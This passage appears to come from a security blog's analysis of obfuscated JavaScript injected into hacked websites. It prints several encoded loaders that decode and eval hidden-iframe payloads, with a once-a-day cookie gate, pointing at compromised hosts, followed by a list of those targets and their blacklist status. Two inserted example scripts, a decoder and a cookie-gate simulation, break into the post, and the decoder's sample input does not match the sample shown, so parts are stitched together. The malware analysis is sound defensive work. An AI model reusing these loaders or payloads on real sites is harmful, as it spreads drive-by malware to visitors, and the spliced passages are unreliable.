  15.     }
  16.     zlxzg = tldot;
  17.     ljy = [];
  18.     for (jnjw = 22 - 20 - 2; - jnjw + 1370 != 0; jnjw += 1) {
  19.         yfap = jnjw;
  20.         if ((0x19 == 031)) ljy += String.fromCharCode(eval(sjadw + zlxzg[1 * yfap]) + 0xa - nkja);
  21.     }
  22.     dbbvw = eval;
  23.     dbbvw(ljy)
  24. }


Malicious payload

The decoded payload injects a hidden iframe pointing to http://oxloxul.net/ibm.php if the gating cookie is not present in the visitor's browser, and then sets that cookie. The expiration time set in SetCookie ensures that the same visitor is not redirected more than once a day.

    function le09() {
        var static = 'ajax';
        var controller = 'index.php';
        var le = document.createElement('iframe');

        le.src = 'http://oxloxul.net/ibm.php';
        le.style.position = 'absolute';
        le.style.color = '840';
        le.style.height = '840px';
        le.style.width = '840px';
        le.style.left = '1000840';
        le.style.top = '1000840';

        if (!document.getElementById('le')) {
            document.write('<p id=\'le\' class=\'le09\' ></p>');
            document.getElementById('le').appendChild(le);
        }
    }

    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }

    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length)))
        {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }

    if (navigator.cookieEnabled)
    {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');
            le09();
        }
    }

Sample 7 

Beautified script 

  1. qhz = "s" + "p" + "li" + "t";
  2. koibb = window;
  3. prfiim = "dy";
  4. vvca = document;
  5. gxccx = "0x";
  6. ylwyp = (5 - 3 - 1);
  7. try {
  8.     ++(vvca.body)
  9. } catch (grt) {
  10.     qtedij = false;
  11.     try {} catch (kkqh) {
  12.         qtedij = 21;
  13.     }
  14.     if (1) {
  15.         cegp ="17:5d:6c:65:5a:6b:60:66:65:17:63:61:71:69:66:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:63:61:71:69:66:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:63:61:71:69:66:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:58:63:6a:5c:58:69:6a:64:5b:25:65:5c:6b:26:58:67:67:6a:26:65:62:5b:43:68:6b:47:71:25:67:5f:67:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:29:28:2b:27:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:29:28:2b:27:67:6f:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:29:28:2b:27:67:6f:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:29:28:2b:27:1e:32:4:1:17:63:61:71:69:66:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:29:28:2b:27:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:61:71:69:66:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:63:61:71:69:66:53:1e:17:5a:63:58:6a:6a:34:53:1e:63:61:71:69:66:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:63:61:71:69:66:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:63:61:71:69:66:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73
:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c
:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:63:61:71:69:66:27:30:1f:20:32:4:1:74:4:1:74"[qhz](":");
  16.     }
  17.     koibb = cegp;
  18.     sul = [];
  19.     for (dadzvp = 22 - 20 - 2; - dadzvp + 1432 != 0; dadzvp += 1) {
  20.         mfemzi = dadzvp;
  21.         if ((0x19 == 031)) sul += String["fromCharCode"](eval(gxccx + koibb[1 * mfemzi]) + 0xa - ylwyp);
  22.     }
  23.     wmoxjo = eval;
  24.     wmoxjo(sul)
  25. }


Malicious payload

The decoded payload injects a hidden iframe pointing to http://alsearsmd.net/apps/nkdLqtPz.php if the gating cookie is not present in the visitor's browser, and then sets that cookie. The expiration time set in SetCookie ensures that the same visitor is not redirected more than once a day.

    function ljzro09() {
        var static = 'ajax';
        var controller = 'index.php';
        var ljzro = document.createElement('iframe');

        ljzro.src = 'http://alsearsmd.net/apps/nkdLqtPz.php';
        ljzro.style.position = 'absolute';
        ljzro.style.color = '2140';
        ljzro.style.height = '2140px';
        ljzro.style.width = '2140px';
        ljzro.style.left = '10002140';
        ljzro.style.top = '10002140';

        if (!document.getElementById('ljzro')) {
            document.write('<p id=\'ljzro\' class=\'ljzro09\' ></p>');
            document.getElementById('ljzro').appendChild(ljzro);
        }
    }

    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }

    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length)))
        {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }

    if (navigator.cookieEnabled)
    {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');
            ljzro09();
        }
    }


Sample 8 

Beautified script 

  1. if (document.querySelector) dllai = 4;
  2. apggms =("82,c8,d7,d0,c5,d6,cb,d1,d0,82,da,92,9b,8a,8b,82,dd,6f,6c,82,d8,c3,d4,82,d5,d6,c3,d6,cb,c5,9f,89,c3,cc,c3,da,89,9d,6f,6c,82,d8,c3,d4,82,c5,d1,d0,d6,d4,d1,ce,ce,c7,d4,9f,89,cb,d0,c6,c7,da,90,d2,ca,d2,89,9d,6f,6c,82,d8,c3,d4,82,da,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d4,c7,c3,d6,c7,a7,ce,c7,cf,c7,d0,d6,8a,89,cb,c8,d4,c3,cf,c7,89,8b,9d,6f,6c,6f,6c,82,da,90,d5,d4,c5,82,9f,82,89,ca,d6,d6,d2,9c,91,91,d7,cf,d9,c7,ce,d6,c8,c7,d5,d6,cb,d8,c3,ce,90,c6,c7,91,d9,d2,8f,c5,d1,d0,d6,c7,d0,d6,91,9a,94,99,c4,d6,cd,d2,c8,90,d2,ca,d2,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,d2,d1,d5,cb,d6,cb,d1,d0,82,9f,82,89,c3,c4,d5,d1,ce,d7,d6,c7,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,c5,d1,ce,d1,d4,82,9f,82,89,97,92,97,99,94,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,ca,c7,cb,c9,ca,d6,82,9f,82,89,97,92,97,99,94,d2,da,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,d9,cb,c6,d6,ca,82,9f,82,89,97,92,97,99,94,d2,da,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,ce,c7,c8,d6,82,9f,82,89,93,92,92,92,97,92,97,99,94,89,9d,6f,6c,82,da,90,d5,d6,db,ce,c7,90,d6,d1,d2,82,9f,82,89,93,92,92,92,97,92,97,99,94,89,9d,6f,6c,6f,6c,82,cb,c8,82,8a,83,c6,d1,c5,d7,cf,c7,d0,d6,90,c9,c7,d6,a7,ce,c7,cf,c7,d0,d6,a4,db,ab,c6,8a,89,da,89,8b,8b,82,dd,6f,6c,82,c6,d1,c5,d7,cf,c7,d0,d6,90,d9,d4,cb,d6,c7,8a,89,9e,d2,82,cb,c6,9f,be,89,da,be,89,82,c5,ce,c3,d5,d5,9f,be,89,da,92,9b,be,89,82,a0,9e,91,d2,a0,89,8b,9d,6f,6c,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c9,c7,d6,a7,ce,c7,cf,c7,d0,d6,a4,db,ab,c6,8a,89,da,89,8b,90,c3,d2,d2,c7,d0,c6,a5,ca,cb,ce,c6,8a,da,8b,9d,6f,6c,82,df,6f,6c,df,6f,6c,c8,d7,d0,c5,d6,cb,d1,d0,82,b5,c7,d6,a5,d1,d1,cd,cb,c7,8a,c5,d1,d1,cd,cb,c7,b0,c3,cf,c7,8e,c5,d1,d1,cd,cb,c7,b8,c3,ce,d7,c7,8e,d0,a6,c3,db,d5,8e,d2,c3,d6,ca,8b,82,dd,6f,6c,82,d8,c3,d4,82,d6,d1,c6,c3,db,82,9f,82,d0,c7,d9,82,a6,c3,d6,c7,8a,8b,9d,6f,6c,82,d8,c3,d4,82,c7,da,d2,cb,d4,c7,82,9f,82,d0,c7,d9,82,a6,c3,d6,c7,8a,8b,9d,6f,6c,82,cb,c8,82,8a,d0,a6,c3,db,d5,9f,9f,d0,d7,ce,ce,82,de,de,82,d0,a6,c3,db,d5,9f,9f,92,8b,82,d0,a6,c3,db,d5,9f,93,9d,6f,6c,82,c7,da,d2,cb,d4,c7,90
,d5,c7,d6,b6,cb,cf,c7,8a,d6,d1,c6,c3,db,90,c9,c7,d6,b6,cb,cf,c7,8a,8b,82,8d,82,95,98,92,92,92,92,92,8c,94,96,8c,d0,a6,c3,db,d5,8b,9d,6f,6c,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,82,9f,82,c5,d1,d1,cd,cb,c7,b0,c3,cf,c7,8d,84,9f,84,8d,c7,d5,c5,c3,d2,c7,8a,c5,d1,d1,cd,cb,c7,b8,c3,ce,d7,c7,8b,6f,6c,82,8d,82,84,9d,c7,da,d2,cb,d4,c7,d5,9f,84,82,8d,82,c7,da,d2,cb,d4,c7,90,d6,d1,a9,af,b6,b5,d6,d4,cb,d0,c9,8a,8b,82,8d,82,8a,8a,d2,c3,d6,ca,8b,82,a1,82,84,9d,82,d2,c3,d6,ca,9f,84,82,8d,82,d2,c3,d6,ca,82,9c,82,84,84,8b,9d,6f,6c,df,6f,6c,c8,d7,d0,c5,d6,cb,d1,d0,82,a9,c7,d6,a5,d1,d1,cd,cb,c7,8a,82,d0,c3,cf,c7,82,8b,82,dd,6f,6c,82,d8,c3,d4,82,d5,d6,c3,d4,d6,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,cb,d0,c6,c7,da,b1,c8,8a,82,d0,c3,cf,c7,82,8d,82,84,9f,84,82,8b,9d,6f,6c,82,d8,c3,d4,82,ce,c7,d0,82,9f,82,d5,d6,c3,d4,d6,82,8d,82,d0,c3,cf,c7,90,ce,c7,d0,c9,d6,ca,82,8d,82,93,9d,6f,6c,82,cb,c8,82,8a,82,8a,82,83,d5,d6,c3,d4,d6,82,8b,82,88,88,6f,6c,82,8a,82,d0,c3,cf,c7,82,83,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,d5,d7,c4,d5,d6,d4,cb,d0,c9,8a,82,92,8e,82,d0,c3,cf,c7,90,ce,c7,d0,c9,d6,ca,82,8b,82,8b,82,8b,6f,6c,82,dd,6f,6c,82,d4,c7,d6,d7,d4,d0,82,d0,d7,ce,ce,9d,6f,6c,82,df,6f,6c,82,cb,c8,82,8a,82,d5,d6,c3,d4,d6,82,9f,9f,82,8f,93,82,8b,82,d4,c7,d6,d7,d4,d0,82,d0,d7,ce,ce,9d,6f,6c,82,d8,c3,d4,82,c7,d0,c6,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,cb,d0,c6,c7,da,b1,c8,8a,82,84,9d,84,8e,82,ce,c7,d0,82,8b,9d,6f,6c,82,cb,c8,82,8a,82,c7,d0,c6,82,9f,9f,82,8f,93,82,8b,82,c7,d0,c6,82,9f,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,ce,c7,d0,c9,d6,ca,9d,6f,6c,82,d4,c7,d6,d7,d4,d0,82,d7,d0,c7,d5,c5,c3,d2,c7,8a,82,c6,d1,c5,d7,cf,c7,d0,d6,90,c5,d1,d1,cd,cb,c7,90,d5,d7,c4,d5,d6,d4,cb,d0,c9,8a,82,ce,c7,d0,8e,82,c7,d0,c6,82,8b,82,8b,9d,6f,6c,df,6f,6c,cb,c8,82,8a,d0,c3,d8,cb,c9,c3,d6,d1,d4,90,c5,d1,d1,cd,cb,c7,a7,d0,c3,c4,ce,c7,c6,8b,6f,6c,dd,6f,6c,cb,c8,8a,a9,c7,d6,a5,d1,d1,cd,cb,c7,8a,89,d8,cb,d5,cb,d6,c7,c6,c1,d7,d3,89,8b,9f,9f,97,97,8b,dd,df,c7,ce,d
5,c7,dd,b5,c7,d6,a5,d1,d1,cd,cb,c7,8a,89,d8,cb,d5,cb,d6,c7,c6,c1,d7,d3,89,8e,82,89,97,97,89,8e,82,89,93,89,8e,82,89,91,89,8b,9d,6f,6c,6f,6c,da,92,9b,8a,8b,9d,6f,6c,df,6f,6c,df".split(","));
  3. vwjs = eval;
  4.  
  5. function acqyu() {
  6.     okuwlg = function () {
  7.         -- (tutgff.body)
  8.     }()
  9. }
  10. tutgff = document;
  11. for (mrhq = 0; mrhq < apggms["length"]; mrhq += 1) {
  12.     apggms[mrhq] = -(98) + parseInt(apggms[mrhq], dllai * 4);
  13. }
  14. try {
  15.     acqyu()
  16. } catch (nnj) {
  17.     dueip = 50 - 50;
  18. }
  19. if (!dueip) vwjs(String["fr" + "omCh" + "arCo" + "de"].apply(String, apggms));
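An eval-free decoder for the token blobs of samples 5 to 8, added here as an example (it is not code from the post or from the malware). The decode loops above reduce to "hex value plus 9" (samples 5 to 7, `eval("0x" + tok) + 0xa - 1`) and "hex value minus 98" (sample 8, `parseInt(tok, 16) - 98`); the example recovers the offset by brute force instead of trusting the loop arithmetic, then pulls the generated function name and the iframe target from the decoded text. Its inputs are the opening tokens of the sample 6 and sample 8 blobs, copied from the listings above.

```javascript
// Added example (not from the post): an eval-free decoder for the token-encoded
// loaders in samples 5-8. Each loader splits a string of hex tokens, adds a fixed
// offset to every value and feeds the result to String.fromCharCode:
//   samples 5-7:  eval("0x" + tok) + 0xa - 1   ->  parseInt(tok, 16) + 9
//   sample 8:     parseInt(tok, 16) - 98
// Instead of trusting the loop arithmetic, the offset is brute-forced and the
// first one that yields printable JavaScript with a function declaration wins.

const PRINTABLE_JS = /^[\x20-\x7e\r\n\t]+$/;

// Decode one blob with a known separator and offset (no eval, no DOM needed).
function decodeTokens(blob, sep, offset) {
  return blob
    .split(sep)
    .map((tok) => String.fromCharCode(parseInt(tok, 16) + offset))
    .join("");
}

// Try every plausible offset; return the first printable decode that contains
// a function declaration, or null if none does.
function recoverOffset(blob, sep) {
  for (let offset = -128; offset <= 128; offset += 1) {
    const text = decodeTokens(blob, sep, offset);
    if (PRINTABLE_JS.test(text) && /\bfunction\b/.test(text)) {
      return { offset, text };
    }
  }
  return null;
}

// Locate the first quoted run of at least 32 hex tokens with a consistent
// ":" or "," separator inside a loader script.
function findEncodedBlob(script) {
  const m = script.match(
    /["']([0-9a-f]{1,2}([:,])[0-9a-f]{1,2}(?:\2[0-9a-f]{1,2}){30,})["']/i
  );
  return m ? { blob: m[1], sep: m[2] } : null;
}

// Decode a loader and pull out what an analyst wants first: the scheme, the
// generated function name and the iframe target. Returns null when the script
// carries no blob this decoder understands.
function analyseLoader(script) {
  const found = findEncodedBlob(script);
  if (!found) return null;
  const recovered = recoverOffset(found.blob, found.sep);
  if (!recovered) return null;
  const fn = recovered.text.match(/\bfunction\s+([A-Za-z_$][\w$]*)\s*\(/);
  const src = recovered.text.match(/\.src\s*=\s*['"]([^'"]+)['"]/);
  return {
    separator: found.sep,
    offset: recovered.offset,
    functionName: fn ? fn[1] : null,
    iframeSrc: src ? src[1] : null,
    decoded: recovered.text,
  };
}

// Inputs: the opening tokens of the sample 6 and sample 8 blobs, copied from the
// beautified scripts above and wrapped in each loader's own assignment syntax.
const SAMPLE6_LOADER =
  'tldot ="' +
  "17:5d:6c:65:5a:6b:60:66:65:17:63:5c:27:30:1f:20:17:72:4:1:" +
  "17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:" +
  "17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:" +
  "17:6d:58:69:17:63:5c:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:" +
  "17:63:5c:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:66:6f:63:66:6f:6c:63:25:65:5c:6b:26:60:59:64:25:67:5f:67:1e:32:4:1" +
  '"[oftkq](":");';
const SAMPLE8_LOADER =
  'apggms =("82,c8,d7,d0,c5,d6,cb,d1,d0,82,da,92,9b,8a,8b,82,dd,6f,6c,82,d8,c3,' +
  'd4,82,d5,d6,c3,d6,cb,c5,9f,89,c3,cc,c3,da,89,9d,6f,6c".split(","));';

// Print the recovered scheme and indicators for both fixtures.
for (const loader of [SAMPLE6_LOADER, SAMPLE8_LOADER]) {
  const r = analyseLoader(loader);
  console.log(`sep ${JSON.stringify(r.separator)} offset ${r.offset}:`,
    r.functionName, "->", r.iframeSrc);
  console.log(r.decoded);
}
```

The brute force is what makes the decoder reusable across samples: the loader's arithmetic changes from family to family (and sample 5 even hides its offset in a variable defined elsewhere), but printable JavaScript with a `function` keyword is found at exactly one offset.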


Malicious payload

The decoded payload injects a hidden iframe pointing to http://umweltfestival.de/wp-content/827btkpf.php if the gating cookie is not present in the visitor's browser, and then sets that cookie. The expiration time set in SetCookie ensures that the same visitor is not redirected more than once a day.

    function x09() {
        var static = 'ajax';
        var controller = 'index.php';
        var x = document.createElement('iframe');

        x.src = 'http://umweltfestival.de/wp-content/827btkpf.php';
        x.style.position = 'absolute';
        x.style.color = '50572';
        x.style.height = '50572px';
        x.style.width = '50572px';
        x.style.left = '100050572';
        x.style.top = '100050572';

        if (!document.getElementById('x')) {
            document.write('<p id=\'x\' class=\'x09\' ></p>');
            document.getElementById('x').appendChild(x);
        }
    }

    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue)
        + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }

    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length)))
        {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }

    if (navigator.cookieEnabled)
    {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');
            x09();
        }
    }
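The cookie gate that all four decoded payloads share, reduced to an in-memory simulation so the once-per-day behaviour can be checked without a browser. This is an added example, not the post's code: the cookie name, value and 24-hour lifetime come from the SetCookie/GetCookie calls above, while the cookie jar and the clock are stubs.

```javascript
// Added example (not from the post): the cookie gate shared by all four decoded
// payloads, driven by an in-memory cookie jar with expiry. Cookie name, value
// and the 24-hour lifetime are taken from the SetCookie/GetCookie calls in the
// payloads; the jar and the clock are stubs.

const GATE_COOKIE = "visited_uq"; // GetCookie('visited_uq') == 55
const GATE_VALUE = "55";
const ONE_DAY_MS = 3600000 * 24;  // expire = today + 3600000 * 24 * nDays, nDays = 1

// Minimal stand-in for document.cookie: name -> { value, expires }.
class CookieJar {
  constructor() {
    this.store = new Map();
  }
  set(name, value, expiresMs) {
    this.store.set(name, { value, expires: expiresMs });
  }
  // Expired cookies are dropped on read, as a browser would drop them.
  get(name, nowMs) {
    const c = this.store.get(name);
    if (!c || c.expires <= nowMs) {
      this.store.delete(name);
      return null;
    }
    return c.value;
  }
}

// One page load at time nowMs. Returns true when the payload would call
// wlzu09()/le09()/ljzro09()/x09() and inject the hidden iframe.
function simulateVisit(jar, nowMs) {
  if (jar.get(GATE_COOKIE, nowMs) == GATE_VALUE) {
    return false; // cookie present and unexpired: the page stays clean
  }
  jar.set(GATE_COOKIE, GATE_VALUE, nowMs + ONE_DAY_MS); // SetCookie('visited_uq', '55', '1', '/')
  return true; // first visit, or first visit after expiry: iframe injected
}

// A scanner that keeps its cookie jar between requests, fetching the page
// `count` times one minute apart: only the first request shows the iframe.
function scanWithPersistentJar(count, startMs) {
  const jar = new CookieJar();
  const hits = [];
  for (let i = 0; i < count; i += 1) {
    hits.push(simulateVisit(jar, startMs + i * 60000));
  }
  return hits;
}

// The same scanner with a fresh jar per request sees the iframe every time.
function scanWithFreshJar(count, startMs) {
  const hits = [];
  for (let i = 0; i < count; i += 1) {
    hits.push(simulateVisit(new CookieJar(), startMs + i * 60000));
  }
  return hits;
}

const start = Date.UTC(2013, 8, 23); // constructed timestamp (the post's date)
console.log("persistent jar:", scanWithPersistentJar(3, start));
console.log("fresh jar:     ", scanWithFreshJar(3, start));
```

This is the detection caveat behind the "cookiebomb" gating: a crawler that carries cookies from one run to the next will report the page clean on every run after the first, so each check of a suspect page needs a fresh cookie jar.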


Summary

All eight payloads are actually the same; the only difference is the function name (and the iframe target it points at). It can be assumed that the attack was automated and infected vulnerable servers/websites on a large scale.

What about the iframes targets?
Let's first list them:
  1. http://brscertification.ir/promo2/Lnr927Qv.php
  2. http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php
  3. http://becattinipiante.it/Grafica/clik.php
  4. http://www.mobileliftoff.com/images/bMXWRTLg.php
  5. http://www.kcrtrucking.com/NJHTk3VC.php
  6. http://oxloxul.net/ibm.php
  7. http://alsearsmd.net/apps/nkdLqtPz.php
  8. http://umweltfestival.de/wp-content/827btkpf.php
All iframes try to load what appear to be .php scripts. The names are meaningless, and a webmaster would be unlikely to create such names for legitimate files, so we can assume the names were generated randomly by the malware tooling.

What about their location on the server? Two of them sit in wp-content folders, i.e. hacked WordPress installations. The others are in promo2, Grafica, images, apps and the top-level directory.

Let's see whether other blacklisting authorities have those domains in their databases.


http://brscertification.ir - is blacklisted by Google. http://www.google.com/safebrowsing/diagnostic?site=http://brscertification.ir

http://viscol.com.tr - was blacklisted by Google in the past for distributing malware. http://www.google.com/safebrowsing/diagnostic?site=http://viscol.com.tr

http://becattinipiante.it - was blacklisted by Google in the past for distributing malware. http://www.google.com/safebrowsing/diagnostic?site=http://becattinipiante.it

http://www.mobileliftoff.com - is CLEAN on Google! http://www.google.com/safebrowsing/diagnostic?site=http://www.mobileliftoff.com We were unable to get the .php script for investigation, but it is clearly suspicious and should be removed by the website owner.

http://www.kcrtrucking.com - is blacklisted by Google. http://www.google.com/safebrowsing/diagnostic?site=http://www.kcrtrucking.com

http://oxloxul.net - is CLEAN on Google! http://www.google.com/safebrowsing/diagnostic?site=http://oxloxul.net The website appears to have been taken down already.

http://alsearsmd.net - is CLEAN on Google! http://www.google.com/safebrowsing/diagnostic?site=http://alsearsmd.net If you open this URL, the PHP script returns a simple "OK" string.

http://umweltfestival.de - is CLEAN on Google! http://www.google.com/safebrowsing/diagnostic?site=http://umweltfestival.de We tried to get the .php code, but the page does not exist.

Obviously, those .php files were intended to perform malicious actions on the visitor's PC; even though we don't know exactly what, it can be anything once the redirect is in place.

Malware clean-up


Such malware is often hidden inside a JavaScript file. If you suspect that your website was infected by similar malware, please use Website Anti-malware Monitoring for a remediation assessment.
